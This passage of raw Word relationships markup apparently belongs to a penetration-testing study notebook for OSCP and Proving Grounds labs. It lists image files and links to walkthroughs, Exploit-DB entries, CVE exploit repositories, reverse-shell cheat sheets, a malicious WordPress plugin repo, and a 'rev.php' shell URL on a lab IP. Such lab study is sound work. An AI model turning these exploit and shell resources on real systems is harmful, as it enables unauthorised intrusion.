Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image248.png"/><Relationship Id="rId1325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/sorcerer" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@anushka18599/offsec-proving-grounds-walkthrough-monster-774a871c6ad7" TargetMode="External"/><Relationship Id="rId1326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image316.png"/><Relationship Id="rId1327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/astronaut-proving-grounds-09c2cf63de97" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image393.png"/><Relationship Id="rId1328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49973" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://explore.whatismybrowser.com/useragents/parse/" TargetMode="External"/><Relationship Id="rId1329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@august.vansickle/proving-grounds-astronaut-walkthrough-1f886c725dec" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image294.png"/><Relationship Id="rId739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image333.png"/><Relationship Id="rId734" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image406.png"/><Relationship Id="rId976" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-shenzi-6976f3938c83" TargetMode="External"/><Relationship Id="rId733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sunsetmidnight-84-100-bc230e87baa2" TargetMode="External"/><Relationship Id="rId975" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId732" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://h0j3n.medium.com/vulnhub-assertion-1-0-1-eb78a0cb9216" TargetMode="External"/><Relationship Id="rId974" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-ground-practice-shenzi-10e684479eb9" TargetMode="External"/><Relationship Id="rId731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.45.232/rev.php" TargetMode="External"/><Relationship Id="rId973" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/btrsys2.1" TargetMode="External"/><Relationship Id="rId738" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image443.png"/><Relationship Id="rId737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/potato" TargetMode="External"/><Relationship Id="rId979" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/sunset-midnight-walkthrough-proving-grounds-08ad53b2200a" TargetMode="External"/><Relationship Id="rId736" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RoqueNight/Linux-Privilege-Escalation-Basics" TargetMode="External"/><Relationship Id="rId978" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wetw0rk/malicious-wordpress-plugin/tree/master?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId735" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image353.png"/><Relationship Id="rId977" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sec-fortress.github.io/posts/pg/posts/Shenzi.html" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/dc-4-vulnhub-98d97fb0fea4" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://explore.whatismybrowser.com/useragents/parse/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@malwarejoe/xposedapi-offsec-proving-grounds-lab-write-up-3848be2c61d3" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-nickel-f76b06f60db1" TargetMode="External"/><Relationship Id="rId730" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.45.232/rev.php" TargetMode="External"/><Relationship Id="rId972" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image543.png"/><Relationship Id="rId971" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId1320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50983" TargetMode="External"/><Relationship Id="rId970" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/btrsys2.1" TargetMode="External"/><Relationship Id="rId1321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@AveragePomelo/proving-ground-practice-walkthrough-apex-linux-0e1e3f227b8e" TargetMode="External"/><Relationship Id="rId1322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://al1z4deh.medium.com/proving-grounds-apex-834e61a9fc03" TargetMode="External"/><Relationship Id="rId1114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/sshpass" TargetMode="External"/><Relationship Id="rId1356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://0xdf.gitlab.io/2024/08/24/htb-runner.html?source=post_page-----01737dd96583---------------------------------------#" TargetMode="External"/><Relationship Id="rId1115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId1357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Stuub/RCity-CVE-2024-27198" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image263.png"/><Relationship Id="rId1116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-44-proving-grounds-bullybox-bc2918d6cbd6" TargetMode="External"/><Relationship Id="rId1358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@kism37/spx-offsecpg-walkthrough-765be7d9a717" TargetMode="External"/><Relationship Id="rId1117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abyssal_bloom/proving-grounds-bitforge-walkthrough-oscp-9aeb4fed4080" TargetMode="External"/><Relationship Id="rId1359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mu.aktepe18/spx-proving-ground-walk-through-57590e101bc2" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dionach/CMSmap" TargetMode="External"/><Relationship Id="rId1118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image362.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/yaldobaoth/OSCP-Scripts#" TargetMode="External"/><Relationship Id="rId1119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/readys-proving-grounds-practice-walkthrough-88a3e0e21f62" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://172.16.xxx" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image188.png"/><Relationship Id="rId767" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sunsetmidnight-84-100-bc230e87baa2" TargetMode="External"/><Relationship Id="rId766" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mysqltutorial.org/mysql-cheat-sheet/" TargetMode="External"/><Relationship Id="rId765" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId522" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image558.png"/><Relationship Id="rId764" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/File_permissions_and_attributes" TargetMode="External"/><Relationship Id="rId529" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image437.png"/><Relationship Id="rId528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image335.png"/><Relationship Id="rId527" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId769" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/ctf-200-08-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-bee721403cd4" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId768" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image509.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://meyerweb.com/eric/tools/dencoder/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://meyerweb.com/eric/tools/dencoder/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-my-cmsms-walkthrough-intermediate-4648b51361f0" TargetMode="External"/><Relationship Id="rId1350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@MEGAZORDI/oscp-practice-proving-grounds-fired-99745bfe2977" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybernews.com/best-password-managers/most-common-passwords/" TargetMode="External"/><Relationship Id="rId1351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/fired-proving-grounds-aad10f26d180" TargetMode="External"/><Relationship Id="rId521" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://revshells.com" TargetMode="External"/><Relationship Id="rId763" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.archlinux.org/index.php/File_permissions_and_attributes" TargetMode="External"/><Relationship Id="rId1110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs" TargetMode="External"/><Relationship Id="rId1352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT%5C" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-walla-walkthrough-2e0c33eb284b" TargetMode="External"/><Relationship Id="rId520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId762" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image528.png"/><Relationship Id="rId1111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId1353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/miko550/CVE-2023-32315?source=post_page-----aad10f26d180---------------------------------------" TargetMode="External"/><Relationship Id="rId761" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image410.png"/><Relationship Id="rId1112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image425.png"/><Relationship Id="rId1354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce" TargetMode="External"/><Relationship Id="rId760" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId1113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/sshpass" TargetMode="External"/><Relationship Id="rId1355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@adamforsythebartlett/scrutiny-walkthrough-proving-grounds-practice-01737dd96583" TargetMode="External"/><Relationship Id="rId1103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId1345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/flu-proving-grounds-5325abd4a4f2" TargetMode="External"/><Relationship Id="rId1104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId1346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-23-proving-grounds-levram-d033737f0025" TargetMode="External"/><Relationship Id="rId1105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Terminal_pager" TargetMode="External"/><Relationship Id="rId1347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50640" TargetMode="External"/><Relationship Id="rId1106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Terminal_pager" TargetMode="External"/><Relationship Id="rId1348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-61-proving-grounds-lavita-05d148d4fbfc" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1RhQmUIfMuqZH7pFYgjnknrBvujfXIy3KbHfP1YIMHg4/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId1107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image542.png"/><Relationship Id="rId1349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joshuavanderpoll/CVE-2021-3129/tree/main" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1F_uFRupd3Q9AW9FFYvuBW9A1JDEot_Wj30nCEovsOpo/edit?usp=sharing" TargetMode="External"/><Relationship Id="rId1108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image433.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ayxantanirverdiyev6/pg-practice-kevin-walkthrough-c6f85d5bc0b9" TargetMode="External"/><Relationship Id="rId1109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://git-scm.com/docs" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><Relationship Id="rId519" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@sakyb7/proving-grounds-hokkaido-tjnull-oscp-prep-ca34df1e6491" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server" TargetMode="External"/><Relationship Id="rId756" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId998" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/impacket-scripts/" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crontab.guru/" TargetMode="External"/><Relationship Id="rId997" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/impacket-scripts/" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image461.png"/><Relationship Id="rId754" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image214.png"/><Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-butch-oscp-prep-2025-practice-14-74a0857cf4bd" TargetMode="External"/><Relationship Id="rId753" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId995" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/backup-backup/" TargetMode="External"/><Relationship Id="rId518" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image416.png"/><Relationship Id="rId517" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image198.png"/><Relationship Id="rId759" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cron" TargetMode="External"/><Relationship Id="rId516" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId758" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://crontab.guru/" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@optimusprime7/sar-walkthrough-offsec-proving-grounds-play-61c4bb97adb6" TargetMode="External"/><Relationship Id="rId999" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.png"/><Relationship Id="rId990" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/btrsys2.1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ayxantanirverdiyev6/pg-practice-billyboss-walkthrough-3f8da159dc2c" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image397.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1i-8STeFDV0TqB1cQvrZ_UWFewP6AtlAKiVLQ3THFuqA/edit?tab=t.0#heading=h.m0qjundbomkr" TargetMode="External"/><Relationship Id="rId1340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/quackerjack" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId510" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentesting.zeyu2001.com/proving-grounds/get-to-work/medjed?source=post_page-----09adfeceaa74---------------------------------------" TargetMode="External"/><Relationship Id="rId752" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/python/#capabilities" TargetMode="External"/><Relationship Id="rId994" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/backup-backup/" TargetMode="External"/><Relationship Id="rId1341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-quackerjack-798eec0b7281" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Tib3rius/AutoRecon" TargetMode="External"/><Relationship Id="rId751" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image254.png"/><Relationship Id="rId993" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image260.png"/><Relationship Id="rId1100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId1342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-quackerjack-373b0e4255e5" TargetMode="External"/><Relationship Id="rId750" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-23-proving-grounds-levram-d033737f0025" TargetMode="External"/><Relationship Id="rId992" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId1101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@bdsalazar/proving-grounds-hunit-intermediate-linux-box-walkthrough-a-journey-to-offensive-security-36081fc196d" TargetMode="External"/><Relationship Id="rId1343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/ctf-200-08-offsec-proving-grounds-practice-labor-day-ctf-machine-walkthrough-bee721403cd4" TargetMode="External"/><Relationship Id="rId991" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image237.png"/><Relationship Id="rId1102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image378.png"/><Relationship Id="rId1344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jbaines-r7/through_the_wire/blob/main/through_the_wire.py" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.revshells.com/" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zeroDaykt/election1-proving-grounds-play-walkthrough-2c35b07844ec" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image540.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image428.png"/><Relationship Id="rId709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e96" TargetMode="External"/><Relationship Id="rId708" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-64-proving-grounds-30964bed6cf3" TargetMode="External"/><Relationship Id="rId707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-dc-1-44cccfbeaa71" TargetMode="External"/><Relationship Id="rId949" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId706" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/quackerjack" TargetMode="External"/><Relationship Id="rId948" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image211.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-squid-1bc1e2dbb8d4" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image236.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/BababaBlue/71d85a7182993f6b4728c5d6a77e669f" TargetMode="External"/><Relationship Id="rId701" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image473.png"/><Relationship Id="rId943" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ishsome.medium.com/proving-ground-djinn3-walk-through-96c92bda7942" TargetMode="External"/><Relationship Id="rId700" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image404.png"/><Relationship Id="rId942" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vgqxjb/ssti1-picoctf-0853498698d5" TargetMode="External"/><Relationship Id="rId941" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vgqxjb/ssti1-picoctf-0853498698d5" TargetMode="External"/><Relationship Id="rId940" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image232.png"/><Relationship Id="rId705" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@bdsalazar/proving-grounds-nibbles-intermediate-linux-box-walkthrough-a-journey-to-offensive-security-918727ec6b25" TargetMode="External"/><Relationship Id="rId947" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image303.png"/><Relationship Id="rId704" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://libcalc.so" TargetMode="External"/><Relationship Id="rId946" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Discovery/Infrastructure/common-http-ports.txt" TargetMode="External"/><Relationship Id="rId703" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image485.png"/><Relationship Id="rId945" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ishsome.medium.com/proving-ground-djinn3-walk-through-96c92bda7942" TargetMode="External"/><Relationship Id="rId702" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId944" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dante-cyber.medium.com/hack-the-box-bike-sp-251a8b5e70f2" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image297.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image452.png"/><Relationship Id="rId75" 